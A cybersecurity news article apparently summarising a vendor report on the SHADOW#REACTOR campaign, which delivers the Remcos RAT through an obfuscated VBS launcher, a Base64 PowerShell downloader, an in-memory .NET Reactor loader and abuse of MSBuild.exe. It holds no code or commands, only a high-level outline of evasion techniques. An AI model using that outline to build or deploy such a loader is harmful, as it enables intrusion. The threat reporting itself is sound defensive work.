A new malware campaign, dubbed ‘SHADOW#REACTOR,’ uses a multi-stage infection chain to deploy the commercially available Remcos remote administration tool (RAT) and establish persistent access to compromised systems.
According to researchers at Securonix, the attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. The script triggers a Base64-encoded PowerShell downloader, which retrieves fragmented, text-based payloads from a remote server.
The fragments are later reconstructed and decoded in memory by a .NET Reactor–protected loader. The final stage uses the legitimate MSBuild.exe as a living-off-the-land binary (LOLBin) to complete execution. Then the Remcos RAT backdoor is fully deployed and takes control of the compromised system.
“In this campaign, Remcos is delivered through an unusual text-only staging pipeline, protected by .NET Reactor and reflective loading techniques. This approach significantly complicates static detection and sandbox analysis while still providing attackers with persistent, covert remote access,” the report notes.
The campaign appears to be opportunistic, mainly targeting enterprise and small-to-medium business environments. While the tactics and techniques observed the campaign resemble the methods commonly associated with initial access brokers (IABs), there’s no evidence pointing to a particular threat actor.
“At present, there is insufficient evidence to attribute this activity to a known threat group or nation-state actor. The infrastructure is transient, and no distinctive code overlaps or operational markers have been identified. SHADOW#REACTOR is therefore best assessed as an unattributed, financially motivated loader framework designed to deliver Remcos RAT at scale while evading detection through in-memory execution and LOLBin abuse,” the report concludes.